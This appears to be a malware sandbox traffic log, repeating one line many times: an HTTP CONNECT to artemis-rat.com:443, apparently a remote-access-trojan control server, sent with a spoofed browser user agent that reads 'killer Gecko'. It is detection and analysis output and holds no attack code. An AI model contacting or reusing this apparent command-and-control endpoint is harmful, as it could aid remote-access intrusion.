Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.com
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
